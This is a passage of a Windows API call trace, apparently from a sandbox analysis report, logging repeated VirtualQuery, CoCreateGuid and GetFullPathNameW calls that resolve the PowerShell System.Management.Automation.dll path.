	[0285.735] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.735] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.735] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.735] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.735] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.736] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.736] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.736] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.736] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.745] VirtualQuery (in: lpAddress=0x16b900, lpBuffer=0x16c7c0, dwLength=0x30 | out: lpBuffer=0x16c7c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.746] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.746] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.746] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.746] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0285.746] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x326a7bf, Data2=0xb6f9, Data3=0x4a97, Data4=([0]=0x83, [1]=0x7e, [2]=0xec, [3]=0x80, [4]=0x55, [5]=0x6c, [6]=0x9f, [7]=0x60))) returned 0x0
	[0285.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.751] VirtualQuery (in: lpAddress=0x16b4c0, lpBuffer=0x16c380, dwLength=0x30 | out: lpBuffer=0x16c380*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.751] VirtualQuery (in: lpAddress=0x16b550, lpBuffer=0x16c410, dwLength=0x30 | out: lpBuffer=0x16c410*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.752] VirtualQuery (in: lpAddress=0x16b770, lpBuffer=0x16c630, dwLength=0x30 | out: lpBuffer=0x16c630*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.753] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xcfab05b7, Data2=0xb64e, Data3=0x4d4b, Data4=([0]=0x9e, [1]=0x56, [2]=0xf1, [3]=0x9d, [4]=0xcc, [5]=0x2a, [6]=0x73, [7]=0x29))) returned 0x0
	[0285.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.754] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x3e0ad5e6, Data2=0x9e78, Data3=0x4244, Data4=([0]=0x98, [1]=0x5f, [2]=0x43, [3]=0xf9, [4]=0x7e, [5]=0x6, [6]=0x91, [7]=0x68))) returned 0x0
	[0285.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.755] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xdd562580, Data2=0x22e2, Data3=0x43bf, Data4=([0]=0xbb, [1]=0x8b, [2]=0x1b, [3]=0xdf, [4]=0xc7, [5]=0x75, [6]=0x5b, [7]=0x33))) returned 0x0
	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
